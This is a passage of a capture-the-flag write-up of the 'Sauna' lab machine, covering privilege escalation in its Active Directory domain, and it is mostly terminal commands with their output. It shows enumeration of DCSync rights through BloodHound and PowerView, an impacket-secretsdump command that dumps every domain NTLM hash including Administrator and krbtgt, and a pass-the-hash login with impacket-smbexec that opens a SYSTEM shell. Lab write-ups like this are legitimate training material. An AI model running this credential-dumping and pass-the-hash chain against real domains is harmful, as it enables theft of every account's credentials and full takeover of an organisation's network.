*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /all

USER INFORMATION
----------------

User Name                   SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

We don't see much here, but from what we found out through Bloodhound, svc_loanmgr has DCSync rights, let's take a look at the Bloodhound query and what Powersploit's PowerView provides.

Using BloodHound

Here, we use Bloodhound and the data retrieved previously from SharpHound.

Bloodhound's DCSync Query

The screenshot above shows the DCSync rights svc_loanmgr has, which are GetChanges and GetChangesAll. These ACLs are the same the Administrators, Enterprise Domain Controllers and Domain Controllers group members have.

Using PowerView

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Get-ObjectAcl -DistinguishedName "DC=EGOTISTICAL-BANK,DC=LOCAL" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}


AceType               : AccessAllowed
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2966785786-3096785034-1186376766-519
AccessMask            : 983551
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed

AceType               : AccessAllowed
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766
InheritanceFlags      : None
BinaryLength          : 20
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-18
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed

PowerView also shows we have DCSync access as svc_loanmgr. Let's move forward and retrieve the NTLM hashes.

Using Impacket's Secretsdump

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-secretsdump -just-dc-ntlm EGOTISTICALBANK/svc_loanmgr@sauna.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:0067e5a87f8d378e81c6f674d49bb841:::
[*] Cleaning up... 

Right there, we were able to extract the Administrator's NTLM hash from ntds.dit. Now we can use this hash to authenticate as the Administrator user through a Pass-the-Hash attack.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-smbexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' EGOTISTICALBANK/Administrator@sauna.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:\Users
[-] You can't CD under SMBEXEC. Use full paths.
C:\Windows\system32>dir "C:\Users\Administrator\Desktop"
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

07/14/2021  03:35 PM    <DIR>          .
07/14/2021  03:35 PM    <DIR>          ..
04/14/2022  02:08 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,821,971,456 bytes free

C:\Windows\system32>type "C:\Users\Administrator\Desktop\root.txt"
30f4bd********************312ab8

And we got root!